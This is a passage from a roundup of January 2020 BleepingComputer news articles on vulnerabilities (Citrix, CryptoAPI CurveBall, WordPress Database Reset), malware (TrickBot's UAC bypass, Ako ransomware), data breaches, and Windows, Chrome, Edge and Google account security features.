Release NetScaler Release Expected Release Date
10.2.6 11.1.63.x 27th January 2020
11.0.3 11.1.63.x 27th January 2020
Citrix recommends customers to upgrade all their vulnerable appliances to a fixed firmware version when it becomes available.

The vulnerability has a severity score of 9.8 out of 10 and was publicly disclosed by Positive Technologies on December 23, 2019. Exploiting it does not require authentication and can allow arbitrary code execution to an attacker that is already on the internal network.


Windows 10 Insider Build 19546 Adds Graphing Mode to Calculator
20.1.2020 
Bleepingcomputer  OS
Windows 10 Build 19013 Out With New DirectX 12 Features for Insiders

Microsoft has released Windows 10 Insider Preview Build 19546 to Insiders in the Fast ring, which has added a new Graphing Mode to the Windows Calculator and fixed bugs in Timeline, Outlook search, and more.

If you are a Windows Insider in the Fast ring, you can update to the Insider Preview Build 19546 by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19546

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

The most notable changes found in this new build released to Windows Insiders in the Fast ring are detailed below.

New Graphing Mode in Windows Calculator
The biggest change in this build is a new Graphing Mode being added to the Windows Calculator.

"Adding support for graphing is one of our top feature requests in Feedback Hub, and we’re excited to bring this feature to our users. Graphing capabilities are also essential for students who are beginning to explore linear algebra. With this feature, we hope to empower students to learn mathematics by improving their conceptual understanding and attitudes towards math."

New Graphing Mode in Windows Calculator
New Graphing Mode in Windows Calculator
This new mode allows users to:

Plot one or more equations on the graph
Add equations with variables.
Analyze the graph.
For those who are interested in testing the app, Microsoft is asking that you post suggestions and feedback in the Feedback Hub.

The new Indexer Diagnostics app
Microsoft has also released a new tool that helps you diagnose Windows search issues called the Indexer Diagnostics app.

If you are having issues with finding your content in Windows Search, you can use this tool to check if a file is indexed, look for failed queries, and check what content is being indexed.

Indexer Diagnostics app
Indexer Diagnostics app
This app is available to anyone running Windows 10 and can be downloaded here.

General changes, improvements, and fixes for PC
We fixed an issue resulting in Timeline not showing any activities.
We fixed an issue resulting in Outlook search not working for some.
We fixed an issue significantly impacting Task View reliability for some.
We fixed an issue where pressing Spatial Sound -> Off in the sound menu caused Explorer.exe to crash.
Known issues
BattlEye and Microsoft have found incompatibility issues due to changes in the operating system between some Insider Preview builds and certain versions of BattlEye anti-cheat software. To safeguard Insiders who might have these versions installed on their PC, we have applied a compatibility hold on these devices from being offered affected builds of Windows Insider Preview. See this article for details.
We are aware Narrator and NVDA users that seek the latest release of Microsoft Edge based on Chromium may experience some difficulty when navigating and reading certain web content. Narrator, NVDA and the Edge teams are aware of these issues. Users of legacy Microsoft Edge will not be affected.
The cloud recovery option for Reset this PC isn’t working on this build. Please use the local reinstall option when performing Reset this PC.
We’re looking into reports of the update process hanging for extended periods of time when attempting to install a new build.
We’re investigating reports that some Insiders are unable to update to newer builds with error 0x8007042b.
We’re looking into reports of certain external USB 3.0 drives not responding with Start Code 10 after they’re attached.
The Optimize Drives Control Panel is incorrectly reporting that optimization has never run on some devices. Optimization is completing successfully, even though it is not reflected in the UI.
The Documents section under Privacy has a broken icon (just a rectangle).
Remote Desktop Connection crashes when attempting to connect to multiple sessions.
Snipping isn’t working on secondary monitors.
The IME candidate window for East Asian IMEs (Simplified Chinese, Traditional Chinese, and the Japanese IME) may not open sometimes. We are investigating your reports. As a workaround if you encounter this, please change the focus to another application or editing area and back to the original and try again. Alternatively, you can go to Task Manager and end the “TextInputHost.exe” task from the Details tab, and it should work afterwards.


FBI to Warn State Officials of Election Infrastructure Cyber Threats
20.1.2020 
Bleepingcomputer  BigBrothers

The Federal Bureau of Investigation (FBI) today announced a change in policy requiring the timely notification of state officials of potential cyber threats to election infrastructure.

"Protecting the integrity of elections in the United States against criminal activity and national security threats is among the top priorities of the Department of Justice (DOJ) and the FBI," says a press release published today.

"Cyber intrusions affecting election infrastructure have the potential to cause significant negative impacts on the integrity of elections."

State election officials now on FBI's notification list
The new internal policy was prompted by the need to make sure that such incidents can be mitigated promptly, something that directly depends on cyber incident notifications being delivered as soon as possible and to the right people after a cyber threat is detected.

Previously, the FBI would only alert the direct victims like counties of hacks affecting election equipment which, unfortunately, wouldn't always translate into immediate reactions because of their limited resources to respond to such attacks.

However, this just introduced policy will allow for speedier responses to cyber intrusions into election systems.

Chief state election officials "with ultimate authority over elections held in the state" that will be alerted by the FBI following such incidents will be able to take more suitable mitigation measures than local officials based on higher authority alone.

"Each state has a designated person to serve as its chief state election official with ultimate authority over elections held in the state, which often includes certifying election results," the FBI explains.

Understanding that mitigation of such incidents often hinges on timely notification, the FBI has established a new internal policy outlining how the FBI will notify state and local officials responsible for administering election infrastructure of cyber activity targeting their infrastructure. - FBI

More importantly, keeping both state and local election officials in the loop will allow for increased reaction times as their cybersecurity defense resources can pull together to fight cyber threats.

"Decisions surrounding notification continue to be dependent on the nature and breadth of an incident and the nature of the infrastructure impacted," the FBI concluded.

"It is the intent of the FBI that this new policy will result in increased collaboration between all levels of government for the integrity and security of U.S. elections."

Election systems part of U.S. critical infrastructure
The U.S. Department of Homeland Security (DHS) designated the country's voting and election systems as critical infrastructure in January 2017 following sanctions announced by White House, the FBI, DHS, and US Treasury against 35 Russian diplomats for Russia's involvement in the 2016 United States elections.

In more recent developments, during October 2019, the FBI updated and expanded a collection of resources and tools designed to help political campaigns, private businesses, and individuals to better recognize and mitigate risks posed by foreign entities' cyber intrusions and disinformation efforts during this year's U.S. election season.

"We’ve created these Protected Voices videos to showcase the methods these adversaries might use, and to help campaigns practice good cyber hygiene, because the foundation of election security is cybersecurity," Director of the FBI Chris Wray said at the time.

The DHS Incident Response Team and the Cybersecurity and Infrastructure Security Agency (CISA) also provide a list of best practices for securing elections systems as part of CISA's Security Tip ST19-002.

All these precautions are important with Microsoft saying in July 2019 that Russian-backed actors attempted to hack into the campaigns of three congressional candidates during the 2018 midterm elections.


Google Chrome Adds Protection for NSA's Windows CryptoAPI Flaw
20.1.2020 
Bleepingcomputer  BigBrothers  Safety

Google just released Chrome 79.0.3945.130, which will now detect certificates that attempt to exploit the NSA discovered CVE-2020-0601 CryptoAPI Windows vulnerability.

As part of Microsoft's January 2020 Patch Tuesday, security updates were released for a vulnerability discovered by the NSA in the Windows CryptoAPI library Crypt32.dll.

This vulnerability allows attackers to create TLS and code-signing certificates that spoof, or impersonate, other companies to perform man-in-the-middle attacks or create phishing sites.

With PoCs for the CVE-2020-0601 vulnerability already released that allow attackers to easily create spoofed certificates, it is only a matter of time before we start to see them used in attacks.

The new version of Chrome blocks spoofed certificates
Today, Google released Chrome 79.0.3945.130, which adds new code by Google's Ryan Sleevi to further check the integrity of a web site's certificate before allowing a visitor to access the site.

Added CVE-2020-0601 detections to Google Chrome
Added CVE-2020-0601 detections to Google Chrome
To show the new protections at work, using Kudelski Security's CVE-2020-0601 test site we can see the vulnerability being exploited on an unpatched Windows 10 PC using an older version of Google Chrome.

CVE-2020-0601 exploited in
On the same unpatched Windows 10 machine using Google Chrome 79.0.3945.130, when you visit the site again the browser now warns that "Attackers might be trying to steal your information".

Google Chrome 79.0.3945.130 with  CVE-2020-0601 detection
Google Chrome 79.0.3945.130 with CVE-2020-0601 detection
Sleevi states that this check is "not perfect", but is good enough for now as users roll out the security updates to their operating systems and Google switches to better verifiers.

"This isn't perfect, but is enough of a safety check until we switch to our verifier or tighten down the blocking of 3P modules, even for CAPI."

It would not be surprising to find other browser and security software start integration detection for CVE-2020-0601 into their products so that even if a company can't immediately install the security patches, they will have a modicum of protection against the vulnerability.


WordPress Plugin Bugs Let Hackers Wipe or Takeover Your Site
20.1.2020 
Bleepingcomputer  Hacking

Critical bugs found in the WordPress Database Reset plugin used by over 80,000 sites allow attackers to drop all users and get automatically elevated to an administrator role and to reset any table in the database.

The open-source WP Database Reset WordPress plugin maintained by WebFactory Ltd is designed to help reset databases to default settings with a few mouse click, wiping all the data stored in the database including posts, pages, users, and more.

WP Database Reset makes it possible to choose between resetting a website's entire database or to reset only specific tables.

Using the WordPress Database Reset plugin
Using the WP Database Reset plugin (WebFactory Ltd)
Unauthenticated database reset and privilege escalation
The two vulnerabilities tracked as CVE-2020-7048 and CVE-2020-7047, rated as Critical and High severity, were patched with the release of WP Database Reset 3.15, a week after the initial disclosure from WordFence, the WordPress security firm that discovered the flaw.

During the last two days since the patched version was released, a little over 8,300 users have already updated their installations, with more than 71,000 still having to secure their websites from potential attacks.

"One of these flaws allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state, while the other flaw allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request," WordFence's Chloe Chamberland says.

Successful exploitation of the two flaws on unpatched WordPress sites could lead to full site takeover and/or database reset.

Vulnerable database reset function
Vulnerable database reset function (WordFence)
The CVE-2020-7048 authentication bypass flaw is caused by improper authentication stemming from missing capability checks or security nonce protection.

Poorly implemented privilege management is behind CVE-2020-7047, a bug that allows site users with subscriber or higher permissions to reset the wp_users table and, after dropping all other users with a simple request, and automatically getting elevated to an admin role.

"A site owner allowing open registration on a site with a vulnerable version of the WP Database Reset plugin could lose control of their site," the Wordfence Threat Intelligence team report adds.

To defend against attacks abusing these flaws, the security outfit advises admins to update to WP Database Reset 3.15 immediately and to keep up to date site backups stored on a different server than the one hosting their WordPress installation.

WordFence also created a video demonstration of how an exploit targeting these vulnerabilities would work.

 


TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection
20.1.2020 
Bleepingcomputer  BotNet  OS

The TrickBot Trojan has received an update that adds a UAC bypass targeting the Windows 10 operating system so that it infects users without displaying any visible prompts.

A UAC bypass allows programs to be launched without displaying a User Account Control prompt that asks users to allow a program to run with administrative privileges.

Example of UAC prompt
Example of UAC prompt
In a new TrickBot sample, Head of SentinelLabs Vitali Kremez discovered that the trojan is now using the Windows 10 Fodhelper bypass.

Using Windows 10 UAC bypass
When executed, TrickBot will check if the operating system is Windows 7 or Windows 10.

If it is Windows 7, TrickBot will utilize the CMSTPLUA UAC bypass and if Windows 10, will now use the Fodhelper UAC Bypass.

The Fodhelper bypass was discovered in 2017 and uses the legitimate Microsoft C:\Windows\system32\fodhelper.exe executable to execute other programs with administrative privileges.

"Fodhelper.exe is a trusted binary on Windows 10 that TrickBot uses to execute the malware stage bypassing UAC via the registry method," Kremez told BleepingComputer in a conversation.

When properly configured, when executed Fodhelper will also launch any command stored in the default value of the HKCU\Software\Classes\ms-settings\shell\open\command key.

As Fodhelper is a trusted Windows executable, it allows auto-elevation without displaying a UAC prompt. Any programs that it executes will be executed without showing a UAC prompt as well.

TrickBot utilizes this bypass to launch itself without a warning to the user and thus evading detection by the user.

Command executed by the Fodhelper UAC bypass
Command executed by the Fodhelper UAC bypass
As more users move to Windows 10 and as Windows Defender matures, more malware has begun to target the operating system and its security features.

In September 2019 we reported how the GootKit banking Trojan also added the Fodhelper bypass in 2019 to execute a command that whitelists the malware executable's path in Windows Defender.

In July 2019, TrickBot also targeted Windows Defender by trying to disable various scan options. With the inclusion of Fodhelper, we continue to see the malware developers attempt to reduce the security features found in Windows 10.


PoCs for Windows CryptoAPI Bug Are Out, Show Real-Life Exploit Risks
20.1.2020 
Bleepingcomputer  Exploit

Proof-of-concept exploit code is now available for the Windows CryptoAPI spoofing vulnerability tracked as CVE-2020-0601 and reported by the National Security Agency (NSA), just two days after Microsoft released a patch.

The PoC exploits for the flaw now known as CurveBall (per security researcher Tal Be'ery) were publicly released during the last 24 hours by Swiss cybersecurity outfit Kudelski Security and ollypwn.

British hardware hacker Saleem Rashid also developed a CurveBall PoC exploit but only tweeted screenshots of his exploit code abusing CVE-2020-0601.

Saleem Rashid
@saleemrash1d
CVE-2020-0601

View image on TwitterView image on Twitter
2,570
6:16 PM - Jan 15, 2020
Twitter Ads info and privacy
1,209 people are talking about this
What's next? Well, after these working PoC exploits were released, users and organizations should patch their systems by applying the security updates Microsoft released during this month's Patch Tuesday.

While the NSA and Microsoft stated that the flaw hasn't yet been exploited in the wild, the agency's advisory recommends installing the patches as soon as possible to block attackers from defeating "trusted network connections and deliver executable code while appearing as legitimately trusted entities."

DHS' Cybersecurity and Infrastructure Security Agency (CISA) also strongly recommended agencies to "patch all affected endpoints within 10 business days" in its second-ever Emergency Directive.

Kudelski Security
@KudelskiSec
On Jan 14. @Microsoft addressed a critical flaw discovered by the #NSA in the #Windows10, Windows Server 2016 and 2019 versions of crypt32.dll, the library implementing Windows' CryptoAPI. @AnomalRoil explains the flaw, and demonstrates it with a POC. https://hubs.ly/H0mCq570

34
4:15 PM - Jan 16, 2020
Twitter Ads info and privacy
25 people are talking about this
What's the potential impact of an attack exploiting CVE-2020-0601?
The spoofing vulnerability impacts Windows 10, Windows Server 2016 and 2019 versions of CRYPT32.DLL, while "an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source," according to Microsoft.

On compromised systems, attackers can launch man-in-the-middle attacks, as well as decrypt confidential info from network connections to impacted software and endpoints.

CERT/CC vulnerability analyst Will Dormann also revealed that "by exploiting this vulnerability, an attacker may be able to spoof a valid X.509 certificate chain on a vulnerable Windows system.

This may allow various actions including, but not limited to, interception and modification of TLS-encrypted communications or spoofing an Authenticode signature."

Chrome PoC on patched system
Chrome PoC on patched system
Chrome PoC on unpatched system
Chrome PoC on unpatched system
As Crowdstrike co-founder Dmitri Alperovitch further explained, the potential impact of CVE-2020-0601 includes remote code execution (due to auth bypass), compromise of HTTPs authentication, spoofing code signing (in user-mode), and spoofing content signing.

The code execution was also confirmed by the NSA: "The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution."

Updated Windows logs exploitation attempts
Crowdstrike's head of EDR, Alex Ionescu and former Project Zero member Matt Tait confirmed yesterday that the Windows Update (WU) system — which was initially thought to have been also impacted — is not affected.

This is because the updates are signed with RSA certificates rather than ECC-based ones, preventing attackers from abusing as part of MiTM attacks to serve malicious code.

Luckily, as security researcher and co-director of the Open Crypto Audit Project (OCAP) Kenneth White noticed, some vendors including Crowdstrike already updated their security solutions to detect CurveBall exploitation attempts, while Microsoft updated Windows Defender to detect "files w/crafted certificates exploiting the certificate validation vulnerability," per Microsoft Defender ATP Product Manager Amitai Rottem.

Windows Event Viewer logging exploit attempts
Windows Event Viewer logging exploit attempts
To sum it all up, per the NSA "the consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available.

Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners."

"In the end, please keep in mind that such a vulnerability is not at risk of being exploited by script kiddies or ransomware," Kudelski Security also added.

"While it is still a big problem because it could have allowed a Man-in-the-Middle attack against any website, you would need to face an adversary that owns the network on which you operate, which is possible for nation-state adversaries, but less so for a script kiddie.

This is why we are releasing this PoC, the exploitability of this vulnerability is not good enough to lead to a sudden ransomware threat (unlike the one we had with Wannacry)."


Google to Kill Chrome Apps Across All Platforms
20.1.2020 
Bleepingcomputer  Security

Google announced that it will slowly phase out support for Chrome apps on all operating systems until they will completely stop working in June 2022 for all users.

Chrome apps are HTML5, CSS, and JavaScript-based web apps that can be installed via the Google Chrome browser for a user experience comparable to that of native applications.

They were officially introduced and made available for download in the Chrome Web Store in May 2013 as "Chrome packaged apps," following the unveiling of a Chrome app launcher developer preview in February 2013.

Chrome Apps phase-out timeline
While this might come as a surprise for some Chrome apps users, this was an announcement expected for a while now given that Google already said in 2016 that "in the second half of 2017, the Chrome Web Store will no longer show Chrome apps on Windows, Mac, and Linux [..]"

This move was prompted by the fact that, as Google revealed three years ago, only roughly 1% of users on Windows, Mac, and Linux were actively using Chrome apps.

Google encouraged web developers at the time to migrate their Chrome apps to the web and, if not possible, to convert them into Chrome extensions or use platforms such as Electron or NW.js.

Expanding on previous announcements, Google has now published a timeline for the full phase-out of Chrome apps during the next two years:

March 2020: Chrome Web Store will stop accepting new Chrome Apps. Developers will be able to update existing Chrome Apps through June 2022.
June 2020: End support for Chrome Apps on Windows, Mac, and Linux. Customers who have Chrome Enterprise and Chrome Education Upgrade will have access to a policy to extend support through December 2020.
December 2020: End support for Chrome Apps on Windows, Mac, and Linux.
June 2021: End support for NaCl, PNaCl, and PPAPI APIs.
June 2021: End support for Chrome Apps on Chrome OS. Customers who have Chrome Enterprise and Chrome Education Upgrade will have access to a policy to extend support through June 2022.
June 2022: End support for Chrome Apps on Chrome OS for all customers.
As the timeline shows, Chrome apps will stop working on Windows, Mac, and Linux in December 2020, with a full shut down for all Chrome OS users in June 2022.

"This change does not impact support for Chrome Extensions. Google will continue to support and invest in Chrome Extensions on all existing platforms," Chrome Platform Team Technical Director Anthony Laforge said.

"Fostering a robust ecosystem of extensions is critical to Chrome's mission and we are committed to providing a useful extension platform for customizing the browsing experience for all users."

Google also provides developers with a Chrome Apps migration site with details on how to build Progressive Web Apps that work on both desktop and mobile platforms, extension-enhanced web pages, and converting Chrome apps into extensions.


Customer-Owned Bank Informs 100k of Breach Exposing Account Balance, PII
20.1.2020 
Bleepingcomputer  Incindent

P&N‌ Bank in Western Australia (WA) is informing its customers that hackers may have accessed personal information stored on its systems following a cyber attack.

The data, some of it sensitive in nature, was stored on the bank’s customer relationship management (CRM) platform that is completely separated from the core banking system.

Plenty of info exposed
A division of Police & Nurses Limited, P&N Bank operates under a Operating under a customer-owned or mutual model, which does not distinguish between members and shareholders as they are one and the same. It is the largest of its kind in the state.

The financial organization says in the breach notification sent to customers that the compromised system contained the following information: names, addresses, emails, age, customer and account numbers, as well as the account balance. All this counts as personally identifiable information that is protected under the Privacy Act in Australia.

Funds, social security numbers, and data in identification documents (driver’s license, passport) were stored on a different system and are safe.

source: @vrNicknack
As many as 100,000 individuals may be impacted by the incident, which was labeled as “sophisticated” by Andrew Hadley, the bank’s chief executive officer.

The attack did not target P&N‌ Bank directly. It occurred during a server upgrade around December 12, 2019, at a third-party that was offering hosting services to the organization.

In a statement for The West Australian, Hadley says that one of the Big Four accounting firms (Deloitte, PricewaterhouseCoopers, Ernst & Young or KPMG) has been commissioned to audit the bank’s IT‌ systems.

“Upon becoming aware of the attack, we immediately shut down the source of the vulnerability,” the bank wrote to customers. The West Australian Police (WAPOL) and federal authorities are on the case.

In the time since discovering the attack and informing its customers, the bank assessed the extent of the incident and allowed the police investigation to develop without alerting the intruder.

P&N Bank assures its customers that protecting their information and funds is a priority, stressing that accounts are kept safe with "highly sophisticated security measures and controls."


Ako Ransomware Uses Spam to Infect Its Victims
20.1.2020 
Bleepingcomputer  Ransomware

It has been discovered that the network-targeting Ako ransomware is being distributed through malicious spam attachments that pretend to be a requested agreement.

Last week we reported on the Ako Ransomware and how it was targeting companies with the intent to encrypt their entire network. At the time, it was not known how it was being distributed and when we asked the ransomware operators they told us it was a "secret".

Since then, the ransomware identification site ID-Ransomware has seen an increasing amount of victims.

ID Ransomware Submissions
ID Ransomware Submissions
David Pickett, a Senior Cybersecurity Analyst at AppRiver, reached out to BleepingComputer yesterday to tell us that his company saw the Ako ransomware being distributed through spam email.

These emails pretend to contain an agreement requested by the recipient and use mail subjects such as "Agreement 2020 #1775505".

Spam email distributing the Ako Ransomware
Spam email distributing the Ako Ransomware
Attached to these emails is a password-protected zip file named agreement.zip with the password '2020' being given in the email.

The extracted archive will contain an executable renamed as agreement.scr that when executed will install the ransomware.

Agreement.zip Archive
Agreement.zip Archive
As shown by this report from JoeSandbox, when Ako is executed it will encrypt the victim's files and leave them with a ransom note named ako-readme.txt.

Ako Ransom Note
Ako Ransom Note
As spam is being used to spread the Ako Ransomware, everyone must be is trained on how to properly identify malicious email and not open any attachments without first confirming who and why they were sent.

This is especially true for email attachments that are in password-protected archives as they commonly used to avoid being detected by secure email gateways and antivirus software.


Online Pharmacy PlanetDrugsDirect Discloses Security Breach
20.1.2020 
Bleepingcomputer  Incindent

Canadian online pharmacy PlanetDrugsDirect is emailing customers, notifying them of a data security incident that might have impacted some of their sensitive personal and financial information.

PlanetDrugsDirect (also known as Planet Drugs Direct) is an active Canadian International Pharmacy Association (CIPA) member, and association of licensed, retail pharmacies that sell medication to Canadian and U.S. citizens, and more

PlanetDrugsDirect describes itself as an "online prescription referral service which provides our customers with direct access to affordable prescription and non-prescription medications" with roughly 400,000 customers.

Online pharmacy security breach
The Canadian online prescription referral service informed a yet unknown number of customers via email of a recent data security incident that may have impacted some of their data.

"Our investigation to date indicates that your exposed data may include your name, address, e-mail address, phone number, medical information including prescription(s), and payment information," PlanetDrugsDirect says in the breach notification.

"At this moment, there is no evidence to suggest passwords for online account access has been compromised," the online pharmacy adds.

PlanetDrugsDirect also states that the incident is currently under investigation and that additional details will be provided as soon as possible.

"We assure you that we are working diligently to complete the investigation and to rectify the situation," the alert also says.

PlanetDrugsDirect security breach notification
PlanetDrugsDirect security breach notification
PlanetDrugsDirect's site says that the online pharmacy collects several types of personal, financial, and medical information "necessary for providing service and arranging to fill your orders through our contracted pharmacies and government approved dispensaries."

The collected information usually includes the following: "name, mailing address, e-mail address, telephone number(s), occupation, employment status, referral source, the name of your primary physician (and his or her contact information), age, height, weight, sex, date of birth, the existence and types of drug allergies, medications requested, family medical history information, your personal medical history information, details of your existing medications, credit card information (including card type and number, expiry date and name of card holder) and prescription information."

Clients warned to track bank account and credit card activity
Customers are also advised in PlanetDrugsDirect's security incident notification to keep a close eye on their bank account and credit card activity.

In the event of any unusual activity, customers should immediately notify their bank and credit card company, as well as PlanetDrugsDirect's staff.

Clients can contact the company at 1-888-791-3784 or via e-mail at info@planetdrugsdirect.com.

"We take the privacy and protection of your data very seriously and we are doing everything we can to ensure that you're not impacted further by this incident," PlanetDrugsDirect concludes.

BleepingComputer confirmed the security incident after calling PlanetDrugsDirect's call center to ask for more details. The company's representative was unable to provide additional info other than customers being notified by email of the incident.

We have also reached out via email asking for more details regarding the reported security breach incident but did not hear back at the time of publication.


iPhones Can Now Double As a Security Key for Google Accounts
20.1.2020 
Bleepingcomputer  Apple
Approving sign-ins to a Google Account from an iPhone (Google)
Google announced that iPhones running iOS 10 or later can now be used as security keys to protect Google accounts against phishing attacks by verifying sign-ins on Chrome OS, iOS, macOS and Windows 10 devices without pairing.

This couldn't have come at a better time given that, according to a recent study conducted by Google and The Harris Poll, 74% out of 500 high-risk US users surveyed - including politicians, activists, executives, and influencers — reported being targeted or compromised by a phishing attack.

The free email service Gmail also automatically blocks over 100 million phishing emails every day according to Google, warning those attacked by government-backed actors of phishing attempts.

By enabling iPhone users to defend against phishing attacks using their phone's security key, Google effectively brought the strongest phishing-resistant two-factor authentication (2FA) to Google accounts on the iOS platform.

Unlike other two-factor authentication (2FA) methods that try to verify your sign-in, security keys are built with FIDO standards that provide the strongest protection against automated bots, bulk phishing attacks, and targeted phishing attacks. - Google

Your iPhone as a Google account security key
This comes after Google also made using the security key built-in Android phones running Android 7.0+ (Nougat) generally available last year, and previously allowing iOS users to verify sign-ins into Google and Google Cloud services with the help of Android phones set up as security keys.

The security key in your iPhone works the same: it uses Bluetooth to verify sign-ins on Chrome OS, iOS, macOS and Windows 10 devices without the need to pair your devices.

This way, you can protect your Google account against hacking attempts on any device with your iPhone's help, even when sensitive information like your user credentials has been stolen.

"This makes it easier and more convenient for you to unlock this powerful protection, without having to carry around additional security keys," Google said. "Use it to protect your personal Google Account, as well as your Google Cloud Accounts at work."

Before setting up your iPhone as a Google account security key you will also be prompted to install the Google Smart Lock app and allow it to send notifications.

Setting up your iPhone
You can set up your phone as a security key for your Google Account using the following steps:

Make sure you have 2-Step Verification or Advanced Protection turned on.
Visit myaccount.google.com/security using a supported browser, like Chrome.
Under "Signing in to Google," select 2-Step Verification. You might need to sign in.
Click Add security key and then Select your iPhone and thenAdd.
Follow the on-screen instructions and turn on your iPhone’s built-in security key by tapping Yes, I’m in when prompted to in the Smart Lock app.
To utilize your iPhone's inbuilt security key to sign in to your Google account on new devices you have to:

Make sure Bluetooth is turned on for both devices.
Sign in to your Google Account on a Chrome OS (version 79 and above), iOS, macOS, or Windows 10 device.
Check your iPhone for a Smart Lock notification. Tap the notification.
To verify your sign-in, tap Yes.
Google also recommends registering a backup security key to your Google account to use in the event that you lose your iPhone.

Use your iPhone to enroll in Google's Advanced Protection Program
"You can now use your mobile phone as a security key in the Advanced Protection Program for the enterprise," Google also announced today.

"This means you can use your Android or iOS device’s built-in security key for 2-Step Verification, which makes it easier and quicker to protect high-risk users with our strongest account security settings."

iPhone users can learn more about signing up for the Advanced Protection Program by going to g.co/advancedprotection.

"With attacks on the rise, and many major events on the horizon this year like the U.S. elections in November, the Advanced Protection Program offers a simple way to incorporate the strongest account protection that Google offers," Google Advanced Protection Program PM Shuvo Chatterjee concluded.


Microsoft's Indexer Diagnostics Helps Troubleshoot Windows Search
20.1.2020 
Bleepingcomputer  OS

Microsoft released an Indexer Diagnostics utility to help users troubleshoot and, in some cases, fix Windows Search problems they might experience on their Windows 10 devices.

The tool, which is still in Beta, does this by allowing you to detect potential issues affecting the Search Indexer service by making it possible to check if your files are indexed and what paths are indexed.

"Indexing is the process of looking at files, email messages, and other content on your PC and cataloging their information, such as the words and metadata in them," Microsoft says. "When you search your PC after indexing, it looks at an index of terms to find results faster."

Indexer Diagnostics

Indexer Diagnostics was developed by Microsoft to make some Windows indexing aspects more readily available without having to deal with the restrictions of an update cadence a source familiar with the matter told BleepingComputer.

Its main purpose is to improve understanding for both users and developers the capabilities of Windows Search, as well as boost the troubleshooting ability and support for general issues affecting Windows Search.

Windows Search troubleshoot helper
By allowing them to look for specific issues affecting the Search Indexer service, the Indexer Diagnostics utility boosts your ability to spot potential issues when Windows Search becomes unresponsive or when search results don't appear as expected on your computer.

Advanced users such as system admins also have the option to track a device's resource usage by collecting resource traces when the indexer uses too many resources from the app's Performance tab, as well as functional traces and application logs when it is not working correctly — these can be attached to bug reports that can .be filed from within the app.

Restart and reset the search service
Restart and reset the search service
However, Indexer Diagnostics' most important feature is its capability to help you fix several problems that might affect Windows Search by restarting the search service or resetting it.

These built-in one-click fixes, available on the 'Search is not working' tab in the app's sidebar almost mirror a list of solutions for Search issues published by Microsoft in September 2019 after fixing a Windows Desktop Search known issue on Windows 10, version 1903 devices where searching did not return any results.

Delivered through the MS Store for faster updates
Since the Indexer Diagnostics tool enables you to restart and reset the Windows Search service with a simple mouse click as opposed to the multi-step procedures needed to do it manually, it should help fix search problems faster.

When this is not possible and Windows Search keeps misbehaving by failing to index your files or failing to show results to your queries, it allows you to file a bug report, together with all the relevant information Microsoft needs to analyze and create a fix for your specific problem.

File not being indexed
File not being indexed
Failed search query
Failed search query
If we take into account the number of Windows 10 users, having reports coming right after problems are detected through the app's inbuilt feedback channel will allow Redmond's developers to react faster and have a resolution ready a lot quicker.

Microsoft uses the MS Store to ship Indexer Diagnostics updates faster without adding weight to the OS and to take advantage of a newly added mechanism designed to deliver functionality to users who need it without affecting those that won't use it as BleepingComputer was also told.

In addition, Redmond will continue adding functionality to the Indexer Diagnostics app in the future, with the end goal of helping Windows 10 customers experiencing search issues to fix them easier or to report them to the development team for faster patches.


Microsoft's New Edge Browser Released, What You Need to Know
20.1.2020 
Bleepingcomputer  OS

Microsoft's Chromium-based Edge browser is officially released and is now available for download. This new browser ditches Microsoft's home-grown EdgeHTML rendering engine for Google's open-sourced platform called 'Chromium' and the Blink rendering engine, which will add greater compatibility and performance.

This first Stable release is Microsoft Edge 79 and can be downloaded immediately from the Microsoft Edge site for both Windows and Mac. Otherwise, Microsoft Edge will be installed automatically over the next coming months via Windows Update.

Microsoft plans on first releasing Microsoft Edge to Windows Insiders in the Release preview ring and then slowly expanding to all other Windows 10 users via Windows Update.

When the new Microsoft Edge is installed, it will replace the existing Edge browser that normally comes with Windows 10. If you do not wish to replace this browser and want to block its install via Windows Update, please see the last section of this article.

It is also possible to run both the classic Edge and the new Microsoft Edge side-by-side using these instructions.

Below we have outlined many of the new features in the new Microsoft Edge browser.

What's new in Microsoft Edge
The new Microsoft Edge is based on Google Chrome so it has many similar features.

Microsoft, though, has also added some features to their browser that makes it stand out from the rest, which we have outlined below.

Block potentially unwanted apps (PUAs)
Chromium-based Microsoft Edge blocks Potentially Unwanted Programs (PUPs) that may display unwanted ads, modify the search engine of the browser, or claim to update your drivers when actually performing malicious or unwanted behavior.

This 'Block potentially unwanted apps' feature blocks Edge from downloading or installing potentially unwanted programs on Windows 10 systems. The feature is not enabled by default and can be enabled from Edge's privacy settings, as highlighted below:

Open Edge settings.
Navigate to Privacy and services settings.
Edge PUPs

Locate "Block potentially unwanted apps" section and enable the feature.
Media Autoplay Blocking
Like the classic Edge, Chromium Edge also comes with a setting to block media autoplay. This prevents videos on random websites with audio from playing in the background without user permission or interaction.

Media play

Media autoplay block settings can be configured from Edge > Settings > Content (edge://settings/content/mediaAutoplay).

Tracking Prevention
Microsoft Edge includes a Tracking prevention feature that blocks third-party tracking scripts on web sites you visit to improve your privacy.

Edge privacy

You can disable this feature off from Edge > Privacy settings or enable the advanced settings to block all trackers.

Use Collections to stay organized
The browser includes a new feature called 'Collections' that helps users organize similar data and save it under one collection.

Collections

This is helpful when comparing shopping items from different stores like Amazon or Microsoft or collect or combine information from multiple sites for a project.

To enable Collections in Microsoft Edge, follow these steps:

In the address bar, enter edge://flags or edge://flags#edge-collections. If you open edge://flags menu, you will have to search for Collections.
Collections

Click the dropdown and choose Enabled.

Click the Restart button located at the bottom banner to relaunch Microsoft Edge with the Collections feature.
Stream 4K Netflix Video
Microsoft Edge is the first Chromium browser to stream Netflix content at 4K resolution. This is done through Microsoft's PlayReady DRM implementation.

Edge 4K

Google Chrome, on the other hand, can only stream Netflix at 1080p HD only.

Edge can Read Web Pages in 24 Different Voices
Microsoft is updating Edge's built-in Read Aloud feature with 24 male and female voices from different parts of the world including the United States, United Kingdom, and India.

The accents of China, Japan, the UK, France, Germany, and Mexico are also supported.

Block Microsoft Edge forced installation
